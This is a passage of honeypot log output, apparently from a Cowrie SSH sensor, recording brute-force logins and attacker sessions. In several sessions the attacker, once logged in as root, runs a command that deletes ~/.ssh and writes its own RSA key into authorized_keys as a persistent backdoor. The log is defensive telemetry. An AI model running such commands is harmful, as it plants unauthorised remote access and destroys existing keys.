:"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:24.478886Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.login.success","username":"root","password":"ame#234rew","message":"login attempt [root/ame#234rew] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:16:25.828495Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:16:26.577002Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:16:26.577663Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:16:26.578856Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:26.889378Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:16:27.561481Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:16:27.562273Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:16:27.887009Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:27.887882Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52680,"dst_ip":"1.2.3.4","dst_port":22,"session":"65d33b8e1467","protocol":"ssh","message":"New connection: 139.59.14.27:52680 (1.2.3.4:22) [session: 65d33b8e1467]","sensor":"my-vps","timestamp":"2025-09-08T13:16:28.194285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:28.195216Z","src_ip":"139.59.14.27","session":"65d33b8e1467"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:28.511301Z","src_ip":"139.59.14.27","session":"65d33b8e1467"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:16:29.819994Z","src_ip":"139.59.14.27","session":"65d33b8e1467"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:31.147754Z","src_ip":"139.59.14.27","session":"65d33b8e1467"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52694,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0b9fdafa9ba","protocol":"ssh","message":"New connection: 139.59.14.27:52694 (1.2.3.4:22) [session: f0b9fdafa9ba]","sensor":"my-vps","timestamp":"2025-09-08T13:16:31.499235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:31.500359Z","src_ip":"139.59.14.27","session":"f0b9fdafa9ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:31.829725Z","src_ip":"139.59.14.27","session":"f0b9fdafa9ba"}
{"eventid":"cowrie.session.connect","src_ip":"181.115.147.5","src_port":39050,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7f683077910","protocol":"ssh","message":"New connection: 181.115.147.5:39050 (1.2.3.4:22) [session: f7f683077910]","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.162096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.163015Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.202267Z","src_ip":"139.59.14.27","session":"f0b9fdafa9ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.361015Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.515230Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:33.532172Z","src_ip":"139.59.14.27","session":"f0b9fdafa9ba"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@1","message":"login attempt [root/admin@1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:16:34.190101Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:16:34.612003Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:16:34.612722Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:16:34.613598Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:34.811699Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:16:35.308976Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.309733Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.508348Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.509272Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.connect","src_ip":"181.115.147.5","src_port":39678,"dst_ip":"1.2.3.4","dst_port":22,"session":"311addaeea1c","protocol":"ssh","message":"New connection: 181.115.147.5:39678 (1.2.3.4:22) [session: 311addaeea1c]","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.704035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.705033Z","src_ip":"181.115.147.5","session":"311addaeea1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:35.902179Z","src_ip":"181.115.147.5","session":"311addaeea1c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:16:36.726708Z","src_ip":"181.115.147.5","session":"311addaeea1c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:37.924867Z","src_ip":"181.115.147.5","session":"311addaeea1c"}
{"eventid":"cowrie.session.connect","src_ip":"181.115.147.5","src_port":40278,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd3199078aad","protocol":"ssh","message":"New connection: 181.115.147.5:40278 (1.2.3.4:22) [session: fd3199078aad]","sensor":"my-vps","timestamp":"2025-09-08T13:16:38.120599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:38.121355Z","src_ip":"181.115.147.5","session":"fd3199078aad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:38.318371Z","src_ip":"181.115.147.5","session":"fd3199078aad"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:16:39.142441Z","src_ip":"181.115.147.5","session":"fd3199078aad"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:39.340463Z","src_ip":"181.115.147.5","session":"fd3199078aad"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:39.341440Z","src_ip":"181.115.147.5","session":"f7f683077910"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":57394,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0530893200","protocol":"ssh","message":"New connection: 134.199.174.250:57394 (1.2.3.4:22) [session: cc0530893200]","sensor":"my-vps","timestamp":"2025-09-08T13:16:43.284994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:16:43.285896Z","src_ip":"134.199.174.250","session":"cc0530893200"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:16:43.555053Z","src_ip":"134.199.174.250","session":"cc0530893200"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123abc","message":"login attempt [guest/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:16:44.411579Z","src_ip":"134.199.174.250","session":"cc0530893200"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:45.711146Z","src_ip":"134.199.174.250","session":"cc0530893200"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":43029,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b32cc3df85e","protocol":"ssh","message":"New connection: 49.247.35.31:43029 (1.2.3.4:22) [session: 3b32cc3df85e]","sensor":"my-vps","timestamp":"2025-09-08T13:16:59.341364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:59.357437Z","src_ip":"49.247.35.31","session":"3b32cc3df85e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:16:59.640018Z","src_ip":"49.247.35.31","session":"3b32cc3df85e"}
{"eventid":"cowrie.login.failed","username":"stack","password":"p@ssw0rd","message":"login attempt [stack/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T13:17:00.816052Z","src_ip":"49.247.35.31","session":"3b32cc3df85e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:17:02.124510Z","src_ip":"49.247.35.31","session":"3b32cc3df85e"}
